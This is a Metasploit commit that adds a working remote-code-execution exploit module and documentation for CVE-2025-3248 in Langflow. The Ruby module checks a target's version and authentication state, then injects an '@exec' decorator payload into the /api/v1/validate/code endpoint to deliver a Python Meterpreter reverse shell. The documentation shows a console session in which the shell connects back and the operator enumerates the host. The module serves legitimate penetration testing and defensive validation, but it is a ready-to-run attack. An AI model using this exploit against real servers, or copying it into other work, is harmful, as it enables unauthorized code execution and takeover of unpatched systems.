Land rapid7#20022, Langflow RCE module

msutovsky-r7 · web-flow · commit 140b93e8024d · 2025-04-14T08:24:44.000+02:00
Add Langflow unauth RCE module (CVE-2025-3248)
diff --git a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2025_3248.md b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2025_3248.md
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.
+A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+
+The vulnerability affects:
+
+    * Langflow < 1.3.0 even if authentication is enabled
+    * Langflow <= 1.3.2 (latest at the time of this writing) if authentication isn't enabled.
+
+This module was successfully tested on:
+
+    * Langflow 1.3.2 installed with Docker (authentication isn't enabled)
+
+
+### Installation
+1. `git clone https://github.com/langflow-ai/langflow.git`
+
+2. `cd langflow/docker_example`
+
+3. `docker compose up`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2025_3248`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/multi/http/langflow_unauth_rce_cve_2025_3248
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/langflow_unauth_rce_cve_2025_3248) > options
+
+Module options (exploit/multi/http/langflow_unauth_rce_cve_2025_3248):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    7860             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Python payload
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/langflow_unauth_rce_cve_2025_3248) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.3.2 detected and authentication is disabled. Which is vulnerable.
+[*] Sending stage (24772 bytes) to 192.168.56.16
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:57118) at 2025-04-12 10:00:32 +0900
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer        : 06d3984f101d
+OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > 
+```
diff --git a/modules/exploits/multi/http/langflow_unauth_rce_cve_2025_3248.rb b/modules/exploits/multi/http/langflow_unauth_rce_cve_2025_3248.rb
@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI RCE',
+        'Description' => %q{
+          Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.
+          A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+        },
+        'Author' => [
+          'Naveen Sunkavally (Horizon3.ai)', # Vulnerability discovery and PoC
+          'Takahiro Yokoyama'                # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-3248'],
+          ['URL', 'https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/'],
+        ],
+        'Platform' => ['python'],
+        'Arch' => [ ARCH_PYTHON ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2025-04-09',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(7860),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+    })
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    json_version = res&.get_json_document&.fetch('version', nil)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless json_version
+
+    version = Rex::Version.new(json_version)
+    return Exploit::CheckCode::Unknown('Failed to get version.') unless version
+
+    return Exploit::CheckCode::Appears("Version #{version} detected. Which is vulnerable even if authentication is enabled.") if version < Rex::Version.new('1.3.0')
+
+    # check if auto_login is enabled or not
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/auto_login')
+    })
+    return Exploit::CheckCode::Appears("Version #{version} detected and authentication is disabled. Which is vulnerable.") if res&.code == 200
+
+    Exploit::CheckCode.Safe("Version #{version} detected and authentication is enabled. which is not vulnerable.")
+  end
+
+  def exploit
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/validate/code'),
+      'headers' => { 'Content-Type' => 'application/json' },
+      'data' => {
+        'code' => "@exec(\"#{payload.encode}\")\ndef #{rand_text_alpha(6)}():\n    pass"
+      }.to_json
+    })
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
+  end
+
+end
